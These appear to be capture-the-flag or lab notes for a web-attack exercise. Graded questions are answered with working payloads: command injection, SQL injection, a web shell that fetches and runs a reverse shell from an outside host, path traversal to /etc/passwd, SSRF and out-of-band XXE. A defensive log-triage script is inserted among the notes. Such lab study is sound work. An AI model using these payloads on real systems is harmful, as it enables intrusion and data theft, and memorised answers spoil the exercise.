Exploit the command injection vulnerability of the target to execute an "id" command. Submit the privileges under which the server is running as your answer. Answer options (without quotation marks): "user", "www-data", "root"
http://10.129.100.72:3003/ping-server.php/system/id
uid=0(root) gid=0(root) groups=0(root)
To execute commands featuring arguments via http://:3003/ping-server.php/system/{cmd} you may have to use ______. Answer options (without quotation marks): "Encryption", "Hashing", "URL Encoding"
URL encoding
What is the username of the third user (id=3)?
└─$ curl http://10.129.100.72:3003/?id=3
[{"id":"3","username":"WebServices","position":"3"}]
Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.
http://10.129.100.72:3003/?id=1%20or%201=1%20--%20true
Achieve remote code execution and submit the server's hostname as your answer.
Upload shell.php
http://10.129.100.72:3001/uploads/shell.php?cmd=id
uid=0(root) gid=0(root) groups=0(root)
http://10.129.100.72:3001/uploads/shell.php?cmd=curl%20http://10.10.14.15/php-reverse-shell.php|php
LFI
ffuf -w "SecLists-master/Discovery/Web-Content/common-api-endpoints-mazen160.txt" -u 'http://10.129.100.72:3000/api/FUZZ'
[Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 295ms]
* FUZZ: download
http://10.129.100.72:3000/api/download
curl "http://10.129.100.72:3000/api/download/..%2f..%2f..%2f..%2fetc%2fhosts"
curl "http://10.129.100.72:3000/api/download/..%2f..%2f..%2f..%2fetc%2fpasswd"
Through the LFI vulnerability identify an existing user on the server whose name starts with "ub". Answer format: ub****
ubuntu
SSRF:
Can you leverage the SSRF vulnerability to identify port 3002 listening locally on the web server? Answer format: Yes, No
curl http://10.129.202.133:3000/api/userinfo
curl "http://10.129.100.72:3000/api/userinfo?id=http://127.0.0.1:3002"
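Added example, not part of the original notes: a defender-side triage script that flags the four GET request shapes used above (command in the /system/{cmd} path, the "or 1=1" id parameter, encoded "../" in /api/download, and a loopback URL in the userinfo id parameter) when they appear in web access logs. The rule names, regexes and sample request lines are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

CMD_PATH = re.compile(r"^/ping-server\.php/system/.+")   # the /system/{cmd} route from these notes
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")     # a ".." path segment after decoding
SQLI = re.compile(r"(?i)\bor\s+(\w+)\s*=\s*\1\b|--\s")   # "or 1=1" style tautology or SQL comment

def fully_unquote(text, rounds=3):
    """Percent-decode several times so double-encoded input (%252f) is normalised too."""
    for _ in range(rounds):
        text = unquote(text)
    return text

def internal_url(value):
    """True when value is a URL whose host is localhost or a non-public IP address."""
    host = ""
    try:
        host = urlsplit(value).hostname or ""
        ip = ipaddress.ip_address(host)
    except ValueError:  # malformed URL, no host, or a DNS name
        return host == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local

def classify(request_line):
    """Return the sorted rule names triggered by one 'METHOD target HTTP/x' log field."""
    parts = request_line.split(" ")
    target = urlsplit(parts[1] if len(parts) > 1 else "")
    path = fully_unquote(target.path)
    hits = set()
    if CMD_PATH.match(path):
        hits.add("command_in_path")
    if TRAVERSAL.search(path):
        hits.add("path_traversal")
    for _name, value in parse_qsl(target.query):
        value = fully_unquote(value)
        if SQLI.search(value):
            hits.add("sqli_tautology")
        if internal_url(value):
            hits.add("ssrf_internal_target")
    return sorted(hits)

# Constructed sample request lines; the paths mirror the requests shown in these notes.
SAMPLES = [
    "GET /?id=3 HTTP/1.1",
    "GET /api/download/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1",
    "GET /api/userinfo?id=http://127.0.0.1:3002 HTTP/1.1",
]
FLAGGED = {line: classify(line) for line in SAMPLES if classify(line)}
```

The XXE request in the next section travels in a POST body, so it does not show up in the request line and needs body inspection or a hardened XML parser configuration instead.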
XXE Injection via API calls
POST /api/login/ HTTP/1.1
Host: 10.129.100.72:3001
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 175
Origin: http://10.129.100.72:3001
Connection: close
Referer: http://10.129.100.72:3001/

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://10.10.14.15:8000"> ]>
<root><email>&somename;</email><password>admin</password></root>
nc -nlvp 8000
listening on [any] 8000 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.100.72] 60398
GET / HTTP/1.0
Host: 10.10.14.15:8000
Connection: close